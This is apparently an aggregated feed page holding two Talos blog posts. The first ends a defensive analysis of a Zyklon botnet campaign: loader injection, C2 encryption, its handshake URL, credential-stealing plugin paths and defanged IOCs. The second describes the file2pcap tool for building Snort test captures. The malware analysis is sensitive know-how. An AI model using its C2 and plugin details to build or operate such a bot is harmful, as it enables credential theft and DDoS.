    The stage injected into RegSvcs.exe is another unobfuscated injector of the final payload. The executable decompresses the payload from the resource section of the PE file, finds and launches Windows Explorer executable that is found in different folders depending on the Windows platform (32 or 64 bit) and launches a remote thread that loads and runs a .NET executable, which is the final payload of the campaign, in this case a sample of the Zyklon HTTP bot.

    Loading managed code into an unmanaged space is not entirely simple process. Attempting to cheat the infection chain to launch the Zyklon bot from the command line was apparently anticipated by the campaign author who modified the Zyklon class Main function to display a text message for anybody trying to launch it this way.

    The original Zyklon code for the version 1.0.0.0 does not seem to contain this mechanism that ensures that the payload is run by a specific loader that does not call the Zyklon Class Main function but a different entry point.


    You are not supposed to run it this way

    The payload is obfuscated using Crypto Obfuscator and an additional code generator. The code which uses xor operations to set a value of a variable used in a switch statement to direct the program flow is relatively easy to follow once the Crypto Obfuscator code transformations are removed, which can be done using a very useful .NET deobfuscation utility de4dot. In fact, the Zyklon Builder, found on VirusTotal, uses the same dnlib library, used also by de4dot and dnspy analysis tools, to add the configuration file to the malicious .NET assembly base Zyklon bot embedded in its resource section.

    Once the obfuscator was removed it did not take too long to realize that for the purpose of the analysis it was possible to manually modify the Zyklon class Main function to call the EntryPoint function which contains the bot code and debug the Zyklon using the dnspy debugger.

    C2 communication (encryption)


    Zyklon's "official" name is "Zyklon H.T.T.P Bot", which is visible in the links to PDB files retained as a remainder of the compilation process. The bot is reasonably well written with precautions for hiding the traffic from network based detection engines, even from intercepting proxies by encrypting all its communications.


    Establishing communication with a C2 server

    The bot connects to one of the three possible C2 servers, starting from the first one specified in its configuration. The server sends a certificate and the communication is first encrypted with RSA and then with a 256 bit long AES with the initialization vector and the key generated by the server, sent back to the client after the client POSTs a request ending with the query gate.php?getkey=y.

    Looking at the DNS requests for one of the C2 servers that remained active throughout the campaign it is possible to see the time when the campaign was active.


    C2 DNS domain activity

    The initial configuration for the bot is embedded within the resource section of the file, together with the list of user agent strings used by the bot when contacting the C2 server. The malicious .NET assembly also contains an encrypted blob that becomes its persistence module injector. Once decrypted and loaded in memory its function is to make sure that the bot is respawned from a remote thread if the main executable is terminated as a process.

    The client then sends a request containing the information about the infected system and receives a configuration string from C2, which sets the internal bot parameters. Several threads are also launched in order to download and execute required additional plugins.

    The main command loop sleeps for 60 seconds and sends a request for a command to the C2 server. The main purpose of the bot seems to be conducting DDoS attacks but there are other more or less standard commands available such as downloading and executing additional payloads from a user-specified URL or logging the user keystrokes and sending them back to the C2 server.

    Curiously, Zyklon may also attempt to enumerate the usual automatic startup locations in the Windows registry to find potential competitive files and submit them to VirusTotal for scanning. So called cloud malware inspection is used to terminate processes based on the VirusTotal verdict. The bot also executes rudimentary heuristic checks for some of the known competitive bot names and filename extensions and tries to remove them if found on the system. Competition is never welcome by the bad guys.

    Zyklon website


    The website advertising Zyklon is hosted on a .onion domain which is also accessible from the clear net through a web to Tor proxy. The owners are advertising two different versions for sale, one that can connect to Tor based C2 servers and the standard one without that capability.

    Perhaps the most interesting page of the Zyklon website are its Terms of Service, which the authors seem to believe may free them from potential prosecution. The user, aka the attacker, allegedly has the sole legal responsibility for damage caused by it, at least according to Zyklon creators :

    YOU UNDERSTAND AND HEREBY ACKNOWLEDGE AND AGREE THAT YOU MAY NOT AND WARRANT THAT YOU WILL NOT:

    1. use the Zyklon H.T.T.P Remote Administration Software for any illegal purpose, or in violation of any laws, including, without limitation, laws governing intellectual property, data protection and privacy, and import or export control;

    2. remove, circumvent, disable, damage or otherwise interfere with security-related features of the Zyklon H.T.T.P Remote Administration Software, features that prevent or restrict use or copying of any content accessible through the Zyklon H.T.T.P Remote Administration Software, or features that enforce limitations on use of the Zyklon H.T.T.P Remote Administration Software;

    3. intentionally interfere with or damage operation of the Zyklon H.T.T.P Remote Administration Software or any user's enjoyment of them, by any means, including uploading or otherwise disseminating viruses, worms, or other malicious code;

    4. post, store, send, transmit, or disseminate any information or material which infringes any patents, trademarks, trade secrets, copyrights, or any other proprietary or intellectual property rights;or

    5. Install and/or use Zyklon H.T.T.P Remote Administration Software on any computer which you do not have explicit permission to do so on;

    6. distribute Zyklon H.T.T.P files over the Internet with the intent of infecting/harming machines of other people;


    Downloaded credential harvesting modules (email, browser, ftp)


    Zyklon creators also advertise a number of useful plugins for harvesting user credentials and stealing confidential information such as details of wallets of various crypto currencies like Bitcoin, LiteCoin and DodgeCoin. For a potential customer, the list of features must be quite impressive. However, not everything is as ideal as it seems at first.

    In the analyzed campaign, the Zyklon main executable downloaded only three plugins, as instructed by the C2 server, all of them with a purpose of stealing user credentials from password caches of the most popular web browsers as well as email and ftp clients.



    CI=False|KT=1|UAC=False|S5=False|ER=False|UPNP=False|RP=True|RW=False| AK=False|BK_CYCLE=|BK_RUN_ONCE=False|SOCKS_PORT=3128|SOCKS_AUTH=False| SOCKS_USERNAME=Nothing|SOCKS_PASSWORD=Nothing|KLI=1|KLM=500|EKL=True| WC=False|BA=MyBtc|LA=MyLtc|KLF=False|BR=True|FTR=True|EMR=True|SFR=False| GR=False|AU=False|UF=N/A|
    Configuration command sent to Zyklon from C2 server

    The plugin download URL follows the format of plugin/index.php?plugin=<pluginname> with possible plugins being

    /plugin/index.php?plugin=browser
    /plugin/index.php?plugin=email
    /plugin/index.php?plugin=ftp!
    /plugin/index.php?plugin=software
    /plugin/index.php?plugin=games
    /plugin/index.php?plugin=cuda
    /plugin/index.php?plugin=minerd
    /plugin/index.php?plugin=sgminer
    /plugin/index.php?plugin=socks
    Available Zyklon plugins

    Downloaded plugins are injected into a previously launched and hollowed legitimate process name "%windir%\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" and are in fact just freeware command line tools written in C/C++ available from the website http://www.securityxploded.com.

    It is likely that Zyklon author realized it would take quite a long time to fully develop all the features within the main Zyklon bot and decided to include available free password dumping utilities just to make its RAT more competitive in what is quite a cutthroat underground market for remote administration tools.

    Conclusion


    Zyklon is quite a well known botnet kit and it has been fairly active this year. In this smaller, possibly more targeted campaign we analyzed, it has shown that its users are employing a number of different technologies and obfuscation techniques to be more successful - from exploiting a vulnerability in Microsoft Word over Autoit scripts and .NET executables, all the way to freeware utilities used as plugins for harvesting credentials from browser cache, email and ftp clients.


    Zyklon campaign execution flow on an endpoint

    Overall, this was a well executed campaign which used compromised hosts as C2 servers. Luckily, there are several weaknesses which can be exploited for detecting its footprint either by inspecting IOCs or tracking the network communications patterns and behavior on endpoints.

    Coverage



    Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

    CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

    Email Security can block malicious emails sent by threat actors as part of their campaign.

    Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.

    AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

    Umbrella prevents DNS resolution of the domains associated with malicious activity.

    Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.


    Iocs

    Document exploits
    ac944374d5f50ecbdd3b9e7151d5a4b055ec18ea26482c2301ccc439164b25be
    996b19658cffedc9395243693c3ca1d12a2c2a2c986e35a877f1ae2a2b595a6d

    PE Exes downloaded by the exploit docs
    4bce73a29ee1b9840cd82d8c08e107179cd74dc1aed488f6d16772ce12092c69
    bcf8dbbc78883b2d84511819123cf39b1c2ffe3cd9763d08fe1544c89084cadf

    ZIP Attachments
    e67db2e2ebd3c540489dd4844b066b45f31b2d879a085eabda1f63926ddc0688
    b1906c1d23f62df7f63a06030f27c3249414d027a9deb62d27f65ec6f3a61adb

    PE exe files within ZIPs
    b7101462507a8cf5bf91b62b641ef1ac3d268115d6dfca54a1625efb07fccf0d
    4bce73a29ee1b9840cd82d8c08e107179cd74dc1aed488f6d16772ce12092c69

    Browser plugin
    e5d2c3a7ddd219ab361af4a709999a492387e3aaf8380187a7699895fc383e40

    FTP plugin
    6a32a0d83a5c955822502444833283a3fde8e1893f1490fac1ae5b84a00db5c6

    Email plugin
    bbcc07baaa00bb30de43a39a04dc66754fe805630f155fde47ab259fdbd03748

    Zyklon Builder v1.0.0
    682d5d60d6fc0e1d5810e9cd9d8b1c6b6fa154d5a790da944177074d28846d66

    Download URLs
    http://wszystkozmetalu[.]pl/Invoiceq.exe
    http://www.blcpolychemical[.]com/re/PurchaseOrders.exe
    http://barkliaytire[.]com
    http://distriegroupelectric[.]com
    http://extreime-net[.]com
    http://distriegroupelectric[.]com:80/plugin/index[.]php?plugin=ftp
    http://distriegroupelectric[.]com:80/plugin/index[.]php?plugin=email
    http://distriegroupelectric[.]com:80/plugin/index[.]php?plugin=browser

    C2

    http://distriegroupelectric.com:80/gate[.]php
    http://distriegroupelectric.com:80/login[.]php - Control Panel

    File2pcap - The Talos Swiss Army Knife of Snort Rule Creation

    $
    0
    0
    This post was authored by Martin Zeiser with contributions by Joel Esler


    At Talos we are constantly on the lookout for threats to our customers networks, and part of the protection process is creating Snort rules for the latest vulnerabilities in order to detect any attacks.

    To improve your understanding of the rule development process, consider a theoretical remotely exploitable vulnerability in server software Server2010. A proof-of-concept exploit is developed, the server software set up on a virtual machine, traffic is captured on  the network between attacker and victim, rule development can start, right?

    But what if months or years later, the rule needs to be re-inspected, because circumstances have changed? This requires another vulnerable version of Server2010 to be found, reinstalled and reconfigured to the vulnerable parameters, to run tests again and again, so that network traffic can be inspected. Then when the server is installed, the particular exploit used does not work anymore, because the language it was written in has since changed and the code needs to be fixed accordingly. All this requires plenty of time, which is why it doesn’t happen that way. Instead, a vulnerability is identified, an exploit is written, the exploit is ran, and the attack captured using Wireshark. From then on, the traffic in said pcap file can be used to develop a correct rule. The traffic recorded in a pcap file can easily be put back on the wire using a tcp replay utility, or read directly by Snort. This is why rule developers generally work with pcaps of attacks, instead of exploits.

    Regarding file-based vulnerabilities, the original process used to involve starting a local webserver and using a browser to download the exploit file, while recording the transfer using Wireshark. File2pcap revolutionized this requirement by simulating the traffic and creating the proper pcap without any hassles.


    Supported protocols:



    HTTP:

    File2pcap started out as a tool to create pcaps from input files, showing these files in transfer from a web server to a browser. By simulating the entire data exchange it is possible to create a pcap file for any input file, usually within seconds. The result always shows a full TCP stream from SYN to FIN with packets in order and checksums correct. These pcap files can then be used in combination with a tcp replay tool (or read by Snort) to create proper rules for all file-based attacks.

    HTTP/2:

    HTTP has evolved in the last number of years, with HTTP/2 now being in widespread use. It is typically used encrypted, but the protocol does also support plaintext connections, which is why HTTP/2 was added to file2pcap.

    HTTP POST:

    Though HTTP GET is the prevalent request coming from a browser, sometimes data is uploaded using HTTP POST. To cover this angle, support for HTTP POST was added to file2pcap.

    SMTP/POP3/IMAP:

    While browser-based attacks are one of the most common ways machines are compromised, another threat is email and attachments. In order to let Snort rule developers create pcaps for these threats just the way file2pcap allowed them for browser-based attacks, new features were added. Specifically support for the SMTP, POP3 and IMAP protocols. When file2pcap is instructed to craft an SMTP pcap from an input file, it simulates an email from a client to a mail server with the input file sent as an attachment to this email. POP3 and IMAP work similarly. Command-line switches allow for the encoding of the attachment to be switched from the default MIME to quoted-printable or even UU-encoding.

    FTP:

    Another typical file transfer protocol which file2pcap supports is the FTP protocol, where both ‘active’ and ‘passive’ data streams can be created.

    IPv6:

    To prepare file2pcap even better for covering any upcoming attacks, one of the latest additions was support for IPv6. Now a simple command-line flag can switch the data exchange from the default IPv4 to IPv6, while keeping everything else the same.

    Talos GitHub


    To wrap it up, file2pcap is a tool which will create a pcap from any input file, simulating this file in transit, using various protocols and encodings. The resulting pcap file can then be used to create or test rules for Snort. File2pcap is in widespread use within Talos for rule creation, as it works reliably while saving plenty of development time.

    File2pcap can be downloaded from our Github page
    Feedback and feature requests are welcome on our Github Issues Page
    Viewing all 1991 articles
    Browse latest View live


    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>